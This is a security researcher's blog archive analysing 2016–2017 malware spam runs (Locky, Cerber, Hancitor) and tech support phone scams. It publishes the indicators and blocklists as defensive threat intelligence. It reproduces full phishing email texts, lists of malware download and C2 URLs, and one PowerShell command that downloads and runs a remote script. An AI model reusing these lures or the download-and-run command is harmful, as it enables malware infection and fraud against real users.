Sponsored by..

Wednesday, 15 February 2017

Malware spam: "RBC - Secure Message" / service@rbc-secure-message.com

This fake banking email leads to some sort of malware:



From:    RBC - Royal Bank [service@rbc-secure-message.com]
Date:    15 February 2017 at 17:50
Subject:    RBC - Secure Message
Signed by:    rbc-secure-message.com


Secure Message Secure Icon
This is an automated message send by Royal Bank Secure Messaging Server. To ensure both you and the RBC Royal Bank comply with current legislation, this message has been encrypted. Please check attached documents for more information.

Note: You should not store confidential information unless it is encrypted.
CONFIDENTIALITY NOTICE:The contents of this email message and any attachments are intended solely for the addressee(s)and may contain confidential and/or privileged information and may be legally protected from disclosure. If you are not the recipient of this message or their agent, or if this message has been addressed to you in error, please immediately alert the sender by reply email and then delete this message and any attachments. If you are not the recipient, you are hereby notified that any use, dissemination, copying, or storage of this message or its attachments is strictly prohibited.


RBCSecureMessage.doc
44K



Attached is a file RBCSecureMessage.doc which contains some sort of macro-based malware. It displays the following page to entice victims to disable their security settings.



Automated analysis is inconclusive [1] [2].  The domain rbc-secure-message.com is fake and has been registered solely for this purpose of malware distribution. In all the samples I saw, the sending IP was 64.91.248.146 (Liquidweb, US) but it does look like all these IPs in the neighbourhood are involved in the same activity:

64.91.248.137
64.91.248.146
64.91.248.148
64.91.248.150

I recommend you block 64.91.248.128/27 at your email gateway to be sure.





Highly personalised malspam making extensive use of hijacked domains

This spam email contained not only the intended victim's name, but also their home address and an apparently valid mobile telephone number:

Sent: 14 February 2017 13:52
To: [redacted]
From: <customer@localpoolrepair.com>
Subject: Mr [Redacted] Your order G29804772-064 confirmation


Dear Mr [redacted],

Thank you for placing an order with us.

For your reference your order number is G29804772-064.

Please note this is an automated email. Please do not reply to this email.

Get your order G29804772-064 details

Your order has been placed and items in stock will be sent to the address shown below. Please check all the details of the order to ensure they are correct as we will be unable to make changes once the order has been processed. You will have been notified at the point of order if an item is out of stock already with expected delivery date.

Delivery Address
[address redacted]
[telephone number redacted]

Delivery Method:
Standard Delivery


Your Order Information
Prices include VAT at 20%


Customer Service Feedback
We are always working to improve the products and service we provide to our customers - we do this through a continual review of the product range, and ongoing training of our Customer Service Team. We continually strive to improve our levels of service and we welcome feedback from our customers regarding your buying experience and the product you receive.

Feefo Independent Reviews
21 days after your purchase, you will receive an email from the independent feedback company Feefo. It takes less than a minute to complete and we'd really appreciate your feedback!


IMPORTANT INFORMATION ABOUT YOUR ORDER

Delivery

Order Tracking
Once your order has left our warehouse we will email you to confirm that the items have been shipped and include tracking details of the parcel so that you may track delivery progress directly with our courier company.

Stock Availability
On very rare occasions not every item will be available when we come to pack and despatch your order. If this is the case you will receive an email from us letting you know which items are affected and an expected delivery time.

Product Returns
All items purchased are covered by our customer friendly returns policy. Please visit for full details.
Thank you for placing your order with us. We really appreciate your custom and will do everything within our power to ensure you get the very best of service.

The data in the spam was identifiable as being a few years old. The intended victim does not appear on the haveibeenpwned.com database. My assumption is that this information has been harvested from an undisclosed data breach.

I was not able to extract the final payload, however the infection path is as follows:

http://bebracelet.com/customerarea/notification-processing-G29804772-064.doc
--> http://customer.abudusolicitors.com/customerarea/notification-processing-G29804772-064.doc
--> https://customer.affiliate-labs.net/customerarea/notification-processing-G29804772-064.zip

This ZIP file actually contains a .lnk file with the following Powershell command embedded in it:

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -w hidden -nop -ep bypass -nologo -c IEX ((New-Object Net.WebClient).DownloadString('http://cristianinho.com/lenty/reasy.ps1'));

I couldn't get a response from the server at cristianinho.com [5.152.199.228 - Redstation, UK], this looks like a possibly legitimate but hijacked domain that uses nameservers belonging to Namecheap. But that's not the only Namecheap connection, because the two "customer" subdomains are also using Namecheap hosting (for the record the subdomains are hosted on - 185.130.207.37 and 185.141.165.204 which is Host1Plus, UK / Digital Energy Technologies, DE).

Three connection to Namecheap is worrying, and certainly we've seen hijacking patterns involving other domain registrars. Or it could just be a coincidence..

The email originated from mx119.argozelo.info on 188.214.88.119 (Hzone, Romania). Just on a hunch, I checked the domain argozelo.info and it appears to be a wholly legitimate site about a Portuguese village, registered at GoDaddy hosted on Blogger. So why does it need a dedicated mail server?

Well.. this particular rabbit hole goes a little deeper. mx119 gives a clue that there might be more than one mailsever, and indeed there are 34 of the critters name mx110.argozelo.info through to mx143.argozelo.info hosted on 188.214.88.110 through 188.214.88.142. But according to Wikipedia, Argozelo only has about 700 inhabitants, so it seems unlikely that they'd need 34 mailservers in Romania.

So, my guess is that argozelo.info has also been hijacked, and hostnames set up for each of the mailservers. But we're not quite finished with this rabbit hole yet. Oh no.

What caught my eye was a mailserver on 188.214.88.110 (the same as mx110.argozelo.info) named mail.localpoolrepair.com which certainly rang a bell because the email was apparently from customer@localpoolrepair.com - yeah, OK.. the "From" in an email can be anything but this can't be a coincidence.

localpoolrepair.com appears to be a legitimate but unused GoDaddy-registered domain, hosted at an Athenix facility in the US. So why is there a mailserver in a Romanian IP block? A DIG at the records for this domain are revealing:

 Query for localpoolrepair.com type=255 class=1
  localpoolrepair.com SOA (Zone of Authority)
        Primary NS: dns.site5.com
        Responsible person: hostmaster@site5.com
        serial:2017021207
        refresh:3600s (60 minutes)
        retry:3600s (60 minutes)
        expire:604800s (7 days)
        minimum-ttl:3600s (60 minutes)
  localpoolrepair.com A (Address) 143.95.232.95
  localpoolrepair.com MX (Mail Exchanger) Priority: 10 mail.localpoolrepair.com
  localpoolrepair.com NS (Nameserver) dns2.site5.com
  localpoolrepair.com NS (Nameserver) dns.site5.com
  localpoolrepair.com TXT (Text Field)
    v=spf1 ip4:188.214.88.110/31 ip4:188.214.88.112/28 ip4:188.214.88.128/29 ip4:188.214.88.136/30 ip4:188.214.88.140/31 ip4:188.214.88.142/32  ~all
So.. the SPF records are valid for sending servers in the 188.214.88.110 through 188.214.88.142 range. It looks to me as if localpoolrepair.com has been hijacked and these SPF records added to it.

So we have hijacked legitimate domains with presumably a neutral or good reputation, and we have valid SPF records. This means that the spam will have decent deliverability. And then the spam itself addresses the victim by name and has personal details presumably stolen in a data breach. Could you trust yourself not to click the link?

Recommended blocklist (email)
188.214.88.0/24

Recommended blocklist (web)
5.152.199.228
185.130.207.37
185.141.165.204




Monday, 23 January 2017

WARNING: pmacademyusa.org / "Project Management Academy USA"

For the past six years I have been following the exploits of Patchree "Patty" Patchrint and Anthony Christopher Jones who claim to run a series of seminars on project management and grant writing. Umm.. and failed restaurants in Los Angeles. I'm not going to repeat all of the information in this post, I advise you to read the whole story.

This latest scheme is a quite snazzy-looking website at  www.pmacademyusa.org called "Project Management Academy USA".

The website may look professional, but it is simply done using the WIX website builder:


You'll notice that the site supplies no information at all about who runs it. However a useful tip alerted me to the site, which is basically a more glitzy version of the Institute of Project Management America from a few years back, including this lazy example of copypasta:

About Project Management Academy USA
At Project Management Academy USA, our programs are led by practitioners-working professionals who are experts in the process of maximizing results using professional project management practices. Modern industry needs results driven professionals who are focused on a disciplined dedication to effective project management from initiation to closing. We strive to combine real-world scenarios, actual case-studies, with the knowledge provided by PMI and academic foundations to create certified project managers who are prepared for further certification and credential. Our programs are ultra-foundational, meaning they ensure attainment of the universal basics of project management, prepare participants for certification exams, and provide the advantage of our mastery components, which are unique to our programs and are followed by a Masters designation.
They currently advertise courses running in the following locations:
January 17-20, 2017
University of Southern California
8:00am to 5:00pm

February 21-24, 2017
University of Miami
8:00am to 5:00pm

February 28 - March 3, 2017
University of Texas at Austin
8:00am to 5:00pm

March 21-24, 2017
University of California Berkeley
8:00am to 5:00pm

March 28-31, 2017
University of Chicago
8:00am to 5:00pm
Funnily enough, the venue seems to be changed at the last minute from the prestigious university it was advertised at to some other location in the rough vicinity. And also, at the last moment the person who was meant to be teaching the course is substituted at the last moment for someone who has to fill in and mysteriously seems to have problems getting paid (if this is you then please add a comment below).

If you have doubts about the quality of these causes, I urge you to read the posts and especially the comments that go with them. Those are not my words, but the words of the people unfortunate enough to either pay for a course or who turn up to teach.


Thursday, 19 January 2017

Malware spam: "The Insolvency Service" / "Investigations Inquiry Notification" / chucktowncheckin.com / chapelnash.com

This malware spam in unusual in many respects. The payload may be some sort of ransomware [UPDATE: this appears to be Cerber].

From: The Insolvency Service [mailto:service@chucktowncheckin.com]
Sent: 19 January 2017 12:22
Subject: EGY 318NHAR12 - Investigations Inquiry Notification



Company Investigations Inquiry
Informing You that we have received appeal regarding your company which indicates corporate misconduct.
Your Inquiry Number: 84725UPTN583
As part of this occasion we have made our own background investigation and if it occurs to be in the public interest, we can apply to the court to wind up the company and stop it trading.
Also if the performance of the director(s) who run the company is questionable enough, we can commence proceedings to disqualify them from governing a limited company for a time span up to 15 years.
FURTHER CASE DATA
The investigation can give us information that we can transmit to another regulatory body that has more suitable powers to deal with any concerns the investigation uncovers.
Help Cookies Contact Terms and conditions Rhestr o Wasanaethau Cymraeg
Built by the Government Digital Service
All content is available under the Open Government Licence v3.0, except where otherwise stated   
© Crown copyright

Sample subjects are:

LSV 354EMPU31 -  Investigations Inquiry Reminder
JXI 647TESR39 -  Investigations Inquiry Reminder
SHV 622WYXP68 -  Investigations Inquiry Notice
QPY 661APWZ41 -  Investigations Inquiry Notice
FHF 338SYBV85 -  Investigations Inquiry Notice
EGY 318NHAR12 -  Investigations Inquiry Notification
IZJ 296CNWP92 -  Investigations Inquiry Notice

All the senders I have seen come from the chucktowncheckin.com domain. Furthermore, all of the sending servers are in the same /24:

194.87.216.87
194.87.216.62
194.87.216.40
194.87.216.43
194.87.216.3
194.87.216.7
194.87.216.80

All the servers have names like kvm42.chapelnash.com in a network block controlled by Reg.ru in Russia.

The link in the email goes to some hacked WordPress site or other, then ends up on a subdomain of uk-insolvencydirect.com e.g. 2vo4.uk-insolvencydirect.com/sending_data/in_cgi/bbwp/cases/Inquiry.php - this is a pretty convincing looking page spoofing the UK government, asking for a CAPTCHA to download the files:


Entering the CAPTCHA downloads a ZIP file (e.g. 3d6Zy.zip) containing a malicious Javascript (e.g. Inquiry Details.js) that looks like this [Pastebin].

Hybrid Analysis of the script is rather interesting, not least because it performs NSLOOKUPs against OpenDNS servers (which is a really weird thing to do give that OpenDNS is a security tool).

The script downloads a component from www.studiolegaleabbruzzese.com/wp-content/plugins/urxwhbnw3ez/flight_4832.pdf and then drops an EXE with an MD5 of e403129a69b5dcfff95362738ce8f241 and a detection rate of 5/53.

Narrowing the Hybrid Analysis down to just the dropped EXE, we can see these peculiar OpenDNS requests as the malware tries to reach out to:

soumakereceivedthiswith.ru (176.98.52.157 - FLP Sidorenko Aleksandr Aleksandrovich, Russia)
sectionpermiathefor.ru (151.0.42.255 - Online Technologies, Ukraine)
programuserandussource.ru (does not resolve)
maytermsmodiall.ru (does not resolve)

It isn't exactly clear what the malware does, but you can bet it is Nothing Good™.

I recommend that you block email traffic from:

194.87.216.0/24

and block web traffic to

uk-insolvencydirect.com
studiolegaleabbruzzese.com
176.98.52.157
151.0.42.255



Thursday, 12 January 2017

Scam: 01254522444, the fake BT engineer and 888DCA60-FC0A-11CF-8F0F-00C04FD7D062

In the past few weeks I have seen a huge upsurge in the number of Indian tech support scammers ringing, both at home and my place of work. (For example.. this).

One common trick they use revolves around this hexadecimal number 888DCA60-FC0A-11CF-8F0F-00C04FD7D062. Either it's a signal that hackers are at your PC, or it's your secret router ID that only BT would know.

The conversation goes something like this..

Victim: "But I don't get my internet from BT.."

Scammer: "BT provides all the internet connections for everyone else, including TalkTalk and Virgin Media."

Victim: "How do I know you're from BT?

Scammer: "There is a confidential Router ID that only BT will know. You can verify this to prove that we are BT."

The scammer then talks the victim through pressing -R then CMD (followed by OK) and then ASSOC (followed by RETURN). That simply produces a list of file associations (e.g. to say that .xlsx is an Excel spreadsheet). The line they want you to see is:
.ZFSendToTarget=CLSID\{888DCA60-FC0A-11CF-8F0F-00C04FD7D062}
This is just something to do with how Windows  handles compressed files and folders. All Windows machines should have t his entry, but it looks sufficiently scary about to impress at least some victims.

NEVER GIVE THESE PEOPLE ACCESS TO YOUR PC.

However, if you want to waste their time please do so.. if you work in IT you can probably play a convincingly dumb user. It seems that they will try for up to 40 minutes or so before they give up. Alternatively, say that you have to get your laptop out from somewhere and it is very slow and just put them on hold. Every minute of their time you can waste will stop them targeting other potential victims.

And don't just ignore the call - report it. If you are in the UK you can report this sort of scam to Action Fraud - it will certainly help law enforcement if they have an idea of how many potential victims there are.

Friday, 23 December 2016

02085258899 - tech support scam (using anydesk.com, teamviewer.com and supremofree.com)

If these people ring you DO NOT GIVE THEM ACCESS TO YOUR PC and either hang up - or waste their time like I do.

It seems there are some prolific technical support scammers ringing from 02085258899 pretending to be from BT. They had a very heavy Indian accent, and they have made many silent calls to my telephone number before today. They claim that hackers are accessing my router.

I wasted 37 minutes of their time, these are some of the steps to watch out for..

  1. They get you to open a command prompt and type ASSOC which brings up a big long list of file associations, in particular they seem interested in one that says .ZFSendToTarget=CLSID\{888DCA60-FC0A-11CF-8F0F-00C04FD7D062}
  2. Then they get you to bring up the Event Viewer by typing EVENTVWR and then clicking "Custom Views" and "Administrative Events". This is a log file that will always show a whole bunch of meaningless errors (such as network faults). It's quite normal for this to look quite bad to the untrained eye.
  3. Then in order they try to get you to connect to the following services to take remote control of your PC: www.anydesk.com, www.teamviewer.com and www.supremofree.com. All of these are legitimate services,but I have to confess I'd never heard of the last one.. so I will add it to my corporate blacklist.
  4. When those didn't work they tried directing me to a proxy at hide.me/proxy and www.hide.me/proxy (the same thing I know) which is probably another candidate for blocking.
Of course, once they have access to your PC they will try to convince you that you need to pay them some money for technical support. Be warned, that they can render your PC unusable if you don't pay, and they can also steal confidential data. Despite how many times they may tell you they are from BT, they are not.. they are simply fraudsters.

Monday, 19 December 2016

Malware spam: "Payslip for the month Dec 2016." leads to Locky

This fake financial spam leads to Locky ransomware:

From:    PATRICA GROVES
Date:    19 December 2016 at 10:12
Subject:    Payslip for the month Dec 2016.

Dear customer,

We are sending your payslip for the month Dec 2016 as an attachment with this mail.

Note: This is an auto-generated mail. Please do not reply.
The name of the sender will vary. Attached is a malicious Word document with a name like Payslip_Dec_2016_6946345.doc which has a VirusTotal detection rate of 12/55.

This Hybrid Analysis clearly shows Locky ransomware in action when the document is opened.

According to my usual reliable source, the various versions of this download a component from one of the following locations:

023pc.cn/8hrnv3
aguamineralsantacruz.com.br/8hrnv3
allard-g.be/8hrnv3
as-kanal-rohrreinigung.de/8hrnv3
aspecta-aso.net/8hrnv3
audehd.com/8hrnv3
audreyetsteve.fr/8hrnv3
baugildealtmark.de/8hrnv3
berstetaler.de/8hrnv3
birdhausdesign.com/8hrnv3
bperes.com.br/8hrnv3
brainfreezeapp.com/8hrnv3
delreywindows.com/8hrnv3
democracyandsecurity.org/8hrnv3
factoryfreeapparel.com/8hrnv3
garosero5.com/8hrnv3
globaser3000.com/8hrnv3
grafiquesvaros.com/8hrnv3
routerpanyoso.50webs.com/8hrnv3
skyers.awardspace.com/8hrnv3
www.andmax-rehabilitacja.pl/8hrnv3
www.bandhiga.com/8hrnv3
www.clinicafisiosan.com/8hrnv3
www.de-klinker.be/8hrnv3
www.foyerstg.pro/8hrnv3
www.globalchristiantrust.com/8hrnv3
www.neumayr-alkoven.com/8hrnv3
zimbabweaids.awardspace.com/8hrnv3

The malware then phones home to one of the following locations:

176.121.14.95/checkupdate (Rinet LLC, Ukraine)
193.201.225.124/checkupdate (PE Tetyana Mysyk, Ukraine)
188.127.237.76/checkupdate (SmartApe, Russia)
46.148.26.82/checkupdate (Infium, Latvia / Ukraine)


A DLL is dropped with a detection rate of 12/52.

Recommended blocklist:
176.121.14.95
193.201.225.124
188.127.237.76
46.148.26.82



Thursday, 15 December 2016

Malware spam: "Payment Processing Problem" leads to Locky

This fake financial spam leads to Locky ransomware:

From:    Juliet Langley
Date:    15 December 2016 at 23:17
Subject:    Payment Processing Problem

Dear [redacted],

We have to inform you that a problem occured when processing your last payment (code: 3132224-M, $789.$63).
The receipt is in the attachment. Please study it and contact us.


-
King Regards,
Juliet Langley

The name of the sender will vary, as will the reference number and dollar amounts. Attached is a ZIP file with a name somewhat matching the reference (e.g. MPay3132224.zip) containing in turn a malicious Javascript with a name similar to ~_AB1C2D_~.js.

My trusted source says that the scripts download a component from one of the following locations:

028cdxyk.com/mltxgc1
1688daigou.com/csuix
2lazy4u.de/ca4yq
adv-tech.ru/7p1jia
allan.multimediedesignerskive.dk/pohtr8mwl
amaniinitiative.org/ubaupn
artcoredesign.com/9ihg6by
atelier-coccolino.com/cvpphnaf7o
auto-zakaz.com.ua/phwcg
bantiki.me/hzzgidch
bikebrowse.com/qap3je2
blueprint-dsg.com/dtr22
bvntech.com/amrwwxei
chonamyoung.com/9vsdld
cprsim.com/h9o3msx
dealspari.com/r2jvx5h6kc
demo.ahost5.ru/dhvzqqbo
demo.pornuha4you.com/lba7ajvti
deutsch.awardspace.info/0zetkhmp
dicksmacker.com/qq4ctnrgc
dryerventexpress.com/pnpafot9g
elevationmusic.de/6gcg6
e-studiz.com/hn0hl7i
formatwerbung.de/axxlilgd
gieslerdavies.com/cjhwnit
goldenarms.myjino.ru/3wn40qkg
gwerucity.org.zw/a3fsqhu9od
happyfeet.de/7rebctpqn5
hho68.com/hbowe
honestflooring.com/85i95u6vd
houssiere.daniel.formations-web.alsace/npqddd8b
infinitecorp.ca/to7jp7
kawagebook.com/5cbwdd5hap
kayamuh.sarf.com.tr/nou0chc
ledticket.com/pbmcdnx5rj
lucapotenziani.com/zjtguxf
mainlinecarriers.co.tz/ycj7o
martawyczynska.com/ilfvn
mbdvacations.com/ou8kkem
movewithgrace.ca/r8omwc
obccllc.com/tze5um3hh
old.strommarnas.se/yazezuw7og
seven-cards.com/xe2llygi
spikaflora.ru/zyubd6mlb
store.elixe.net/jltuvjpcsh
test1.zrise.top/isk90e
testlife.ruyigou.com/pv2ryezg7
theexcelconsultant.com/vp9u7tpa
thezenatwork.com/yd2c49vg0
topstoneisland.com/ud4jqd
tunca.bel.tr/uo3jnqkgxn
ustadhanif.com/q0w93lkrvp
www.boldrini.org.br/csneth51
www.chocolaterie-servant.com/1l38y2p
www.englishworld.it/w6ynmr
www.kottalgenealogy.com/vkwf5rll0s
www.sapol.it/ou8e1ftep
zapotech.com/sqagj4
zhongguanjiaoshi.com/mklu7

The malware then phones home to the following locations:

185.129.148.56/checkupdate (MWTV, Latvia)
178.209.51.223/checkupdate [hostname: 454.SW.multiservers.xyz] (EDIS, Switzerland)
37.235.50.119/checkupdate [hostname: 454.2.SW.multiservers.xyz] (EDIS, Switzerland)


Recommended blocklist:
185.129.148.0/24
178.209.51.223
37.235.50.119

Malware spam: "Amount Payable" leads to Locky

This fake financial spam leads to Locky ransomware:

From:    Lynn Drake
Date:    15 December 2016 at 09:55
Subject:    Amount Payable

Dear [redacted],
The amount payable has come to $38.29. All details are in the attachment.
Please open the file when possible.


-
Best Regards,
Lynn Drake
The name of the sender will vary, although the dollar amount seems consistent in all the samples I have seen. Attached is a file with a name similar to doc_6937209.zip which contains an apparently randomly-named script in a format similar to ~_ZJR8WZ_~.js. The highly obfuscated script of one sample can be seen here. Typical detection rates for the script are around 16/54.

There are many different scripts, downloading a component from one of the following locations (thanks to my usual reliable source):

0668.com/k5bhgn
250sb.com./jynvmx
addwords.com.tr/aah6qmhv
anti-dust.ru/7k6cp
asdream.pl/gbbs1c
atio.li/exjik
bappeda.dharmasrayakab.go.id/dlhalychp
braindouble.com/uycx51ix
buhoutserts.ru/ufdazc6vv
casino-okinawa.com/ejguf
catherineduret.ch/5qpqi5ezp
chinaxw.org/xw1ju7y6zc
chungcuvinhomemydinh.com/6dvjasf
crolic88.myjino.ru/1ddig
demo.shispare.com/bvsjq
environment.ae/0od5hn
forbrent.com/h9kqgq
fyd123.cn/kib6h2d9ga
groupeelectrogeneservice.com/eefpeywf9z
hedefosgb.com/dpyzsb6u
hlonline.kentucky.com/i7z78
innercityarts.squaremdesign.com/dyo1w7
jianhu365.com/z9puqdj2eu
malamut.org/gizb2zq
obaloco.com.br/67mfj
peopleprofit.in/pyihdg
roman64.humlak.cz/7bnisgf
rulebraker.ru/zsw4cnf9o
scaune.qmagazin.ro/5hktu4h
slankmethode.nl/4zzq1am
subys.com/mjguriv80
szwanrong.com/x5qxzpjsi
tecnomundo.uy/a8rnlgzv
test1.giaiphaponline.org/0ytdjs1
test.sousouyo.com/feaetpnuee
theamericanwake.com/xw1ju7y6zc
travelinsider.com.au/mwaefb4b
trietlong.net/heyus
tx318.com/kqe4ca
ucbus.net/usdxqqt6
u-niwon.com/kmjg6j9ske
vaaren.dk/ogcz6ys0d
viscarci.com/wyqs6353
walkonwheels.net.au/qmd1uu
wdcd999.com/lm5z2snyqn
web-shuttle.in/eeo9oc
windshieldrepairvancouver.ca/qcp8k7
wiselysoft.com/qcymgbug7
wszystkodokuchni.pl/sl5yko7
wudiai.com/mc3hnwd
www.espansioneimmobiliare.com/akktnck
www.myboatplans.net/6d7ukeco6
wx.utaidu.com/1eybujbru
xlr8services.com/n970foumf
xn--k1affefe.xn--p1ai/8wzzjk24u
youspeak.pt/liowrtxs
yukngobrol.com/h7sfu
zhiyuw.com/qfbdcvrul
zwljfc.com/ld1pvjozu
zzzort10xtest123.com/nin5k3bwo

According to this Malwr analysis, a DLL is dropped with a detection rate of 18/55.  This Hybrid Analysis shows the Locky infection clearly and identifies some C2s, combining this with another source gives the following list of C2 servers:

86.110.117.155/checkupdate (Rustelekom, Russia)
185.129.148.56/checkupdate (MWTV, Latvia)
185.17.120.166/checkupdate (Rustelekom, Russia)


MWTV is a known bad host, so I recommend blocking the entire /24.

Recommended blocklist:
86.110.117.155
185.129.148.0/24
185.17.120.166


Monday, 12 December 2016

Malware spam: "New(910)" leads to Locky

This spam leads to Locky ransomware:

From:    Savannah [Savannah807@victimdomain.tld]
Reply-To:    Savannah [Savannah807@victimdomain.tld]
Date:    12 December 2016 at 09:50
Subject:    New(910)

Scanned by CamScanner


Sent from Yahoo Mail on Android

The spam appears to come from a sender within the victim's own domain, but this is just a simple forgery. The attachment name is a .DOCM file matching the name in the subject. Automated analysis [1] [2] indicates that it works in a similar way to this other Locky ransomware run today.

Malware spam: "Invoice number: 947781" leads to Locky

This fake financial spam comes from multiple senders and leads to Locky ransomware:


From:    AUTUMN RHINES
Date:    12 December 2016 at 10:40
Subject:    Invoice number: 947781

Please find attached a copy of your invoice.


Tel: 0800 170 7234
Fax: 0161 850 0404

For all your stationery needs please visit Stationerybase.
The name of the sender varies, as does the fake invoice number. Attached is a .DOCM file with a filename matching that invoice number. Typical detection rates for the DOCM file are 13/56.

Automated analysis of a couple of these files [1] [2] [3] [4] show the macro downloading a component from miel-maroc.com/874ghv3  (there are probably many more locations). A DLL is dropped with a current detection rate of 11/57.

All those analyses indicate that this is Locky ransomware (Osiris variant), phoning home to:

176.121.14.95/checkupdate (Rinet LLC, Ukraine)
88.214.236.218/checkupdate (Overoptic Systems, UK / Russia)
91.219.31.14/checkupdate (FLP Kochenov Aleksej Vladislavovich aka uadomen.com, Ukraine)


Recommended blocklist:
176.121.14.95
88.214.236.218
91.219.31.14




Friday, 9 December 2016

Malware spam: "Firewall Software" leads to Locky

This spam appears to come from multiple senders and leads to Locky ransomware:

From:    Herman Middleton
Date:    9 December 2016 at 07:40
Subject:    Firewall Software

Hey [redacted], it is Herman. You've asked me to order new firewall software for our office computers.
Done and ready. Here, in the attachment, is the full invoice of the software counteragent.

Please check it out.


--
King Regards,
Herman Middleton
IT Support Manager
Attached is a ZIP file with a name like f_license_5330349.zip which contains a randomly named .js script which is very highly obfuscated.

The Hybrid Analysis and Malwr report show that the script analysed downloads a component from welte.pl/mupze (there will probably be dozens of other locations) and appears to drop a DLL with a detection rate of 4/56. That Hybrid Analysis also detections C2 traffic to:

107.181.187.97/checkupdate [hostname: saluk1.example.com] (Total Server Solutions, US)
51.254.141.213/checkupdate (OVH, France)


It's worth mentioning perhaps that other Locky C2 servers seen in the past 12 hours are as follows:

91.142.90.46/checkupdate [hostname: mrn46.powerfulsecurities.com] (Miran, Russia)
195.123.209.23/checkupdate [hostame: prujio.com] (Layer6, Latvia)
185.127.24.247/checkupdate [hostname: free.example.com] (Informtehtrans, Russia)
176.121.14.95/checkupdate (Rinet LLC, Ukraine)
185.46.11.236/checkupdate (Agava, Russia)
178.159.42.248/checkupdate (Dunaevskiy Denis Leonidovich / Zomro, Ukraine)


Although some of these are from different sub-groups of Locky pushers, let's stick them all together for the sake of convenience. Note that there are a at least a couple of bad /24 blocks in there.

Recommended blocklist:
51.254.141.213
91.142.90.46
107.181.187.97
176.121.14.95
178.159.42.248
185.46.11.0/24
185.127.24.247
195.123.209.0/24


Monday, 5 December 2016

Malware spam: "Shipping status changed for your parcel # 1996466" / ups@ups-service.com

This fake UPS spam has a malicious attachment:

From:    UPS Quantum View [ups@ups-service.com]
Date:    5 December 2016 at 17:38
Subject:    Shipping status changed for your parcel # 1996466

Your parcel has arrived, but we were unable to successfully deliver it because no person was present at the destination address.

There must be someone present at the destination address, on the delivery day, to receive the parcel.

Shipping type: UPS 3 Day Select
Box size: UPS EXPRESS BOX
Date : Nov 14th 2016
You can reschedule the delivery over the phone, but you will have to confirm the information on the delivery invoice.

The delivery invoice  can be downloaded from our website :
https://wwwapps.ups.com/WebTracking/view_invoice?id=1996466&delivery_date=1204&account=[redacted]

 
Thank you for shipping with UPS

Copyright © 1994-2016 United Parcel Service of America, Inc. All rights reserved.
The link in the email actually goes to a URL vantaiduonganh.vn/api/get.php?id= plus a Base 64 encoded part of the URL (e.g. aGVscGRlc2tAZmJpLmdvdg==) and it downloads a Word document with the recipients email address included in it. This type of malware is typically seen using hacked but legitimate Vietnamese sites for this stage in the infection chain.

This DOC file contains a malicious macro, the Malwr report indicates that it downloads components from:

parkovka-rostov.ru/inst.exe
stela-krasnodar.ru/wp-content/uploads/pm22.dll

Those two locations are legitimate hacked sites. This has a detection rate of 7/56 plus a DLL with a detetion rate of 37/56. The malware appears to be Hancitor / Pony / Vawtrak, phoning home to:

cothenperci.ru/borjomi/gate.php
madingtoftling.com/ls5/forum.php


Both of these are hosted on the same IP address of 185.31.160.11 (Planetahost, Russia). The following malicious domains are also hosted on the same IP:

atiline.ru
vkplitka.ru
teunugtin.ru
cyrebsedri.ru
verarsedme.ru
cothenperci.ru
undorrophan.ru
verciherthan.ru
cypegeding.com
ferabrighrob.com
nastylgilast.com
madingtoftling.com


Recommended blocklist:
185.31.160.11
parkovka-rostov.ru
stela-krasnodar.ru


Malware spam: "Please Consider This" leads to Locky

This fake financial spam leads to malware:

From:    Aimee Guy
Date:    5 December 2016 at 13:32
Subject:    Please Consider This

Dear [redacted],

Our accountants have noticed a mistake in the payment bill #DEC-5956047.
The full information regarding the mistake, and further recommendations are in the attached document.

Please confirm the amount and let us know if you have any questions.

Attached is a ZIP file with a name somewhat matching the reference in the email, containing a malicious VBS script with a filename made up in part of the date.

The scripts download another component from one of the following locations, according to my usual reliable source:

admin3.rtaf.mi.th/8765r
buhoutserts.ru/8765r
chanet.jp/8765r
guardian-angels-diva.de/8765r
haibeiwuliu.com/8765r
hzxihe.com/8765r
linghangcj.com/8765r
markettv.ro/8765r
maycongtrinhduylong.com/8765r
natashacollis.com/8765r
ruifengweb.com/8765r
rulebraker.ru/8765r
szwanrong.com/8765r
temai1.com/8765r
travelinsider.com.au/8765r
tx318.com/8765r
ucbus.net/8765r
u-niwon.com/8765r
valuationssa.com.au/8765r
vipseal.de/8765r
viscarci.com/8765r
wdcd999.com/8765r
wiky.net/8765r
windshieldrepairvancouver.ca/8765r
wiselysoft.com/8765r
wishingwellhosting.com.au/8765r
wszystkodokuchni.pl/8765r
wudiai.com/8765r
xlr8services.com/8765r
xn--pasaer-spb.pl/8765r
youspeak.pt/8765r
zhiyuw.com/8765r
zwljfc.com/8765r

It drops a payload with an MD5 of 529789f27eb971ff822989a5247474ce and a current detection rate of just 1/54. The malware then phones home to the following locations:

91.142.90.61/information.cgi [hostname: smtp-server1.ru] (Miran, Russia)
195.19.192.99/information.cgi (EkaComp, Russia)


These IPs were also used in this earlier attack.

Recommended blocklist:
185.82.217.28
91.142.90.61
195.19.192.99


Malware spam: "Emailing: _9376_924272" / "No subject" leads to ".osiris" Locky.

This spam comes in a few different variants, and it leads to Locky ransomware encrypting files with an extension ".osiris"

The more word version comes from random senders with a subject like _9376_924272 or some other randomly-numbered sequence. Attacked to that is an XLS file of the same name and it includes this body text:

Your message is ready to be sent with the following file or link
attachments:

  _9376_924272


Note: To protect against computer viruses, e-mail programs may prevent
sending or receiving certain types of file attachments.  Check your e-mail
security settings to determine how attachments are handled.
The second version has no body text and the subject No subject or (No subject). The XLS file is named in a format incorporating the date, e.g. 2016120517082126121298.xls

The macro in the malicious Excel file downloads a component from on of the following locations (according to my usual reliable source):

aetech-solutions.com/87t34f
analypia.com/87t34f
angiebundy.com/87t34f
antelope.co.uk/87t34f
cafe-bg.com/87t34f
dachbud.slask.pl/87t34f
davetoll.com/87t34f
dcareug.com/87t34f
deminico.com/87t34f
griptrix.com/87t34f
kamico.net/87t34f
kelbud.pl/87t34f
ktlelektro.cz/87t34f
laferwear.com/87t34f
masterstudio.org/87t34f
milano.koscian.pl/87t34f
paradiseinfiji.com/87t34f
rongdaistudio.com/87t34f
rsaf.cz/87t34f
sevenseas.lk/87t34f
soulscooter.com/87t34f
sparky.com/87t34f
ssivendorinformation.com/87t34f
sublimeshop.co.uk/87t34f
subys.com/87t34f
tppsk.marcinczaja.pl/87t34f
tybor.hu/87t34f
waat.co.uk/87t34f
www.riojadental.com/87t34f
www.stavros.ca/87t34f
zealcon.com/87t34f

You can see some of the things done in these two Malwr reports [1] [2]. The Locky ransomware dropped then phones home to one of the following locations:

185.82.217.28/checkupdate [hostname: olezhkakovtony11.example.com] (ITL, Bulgaria)
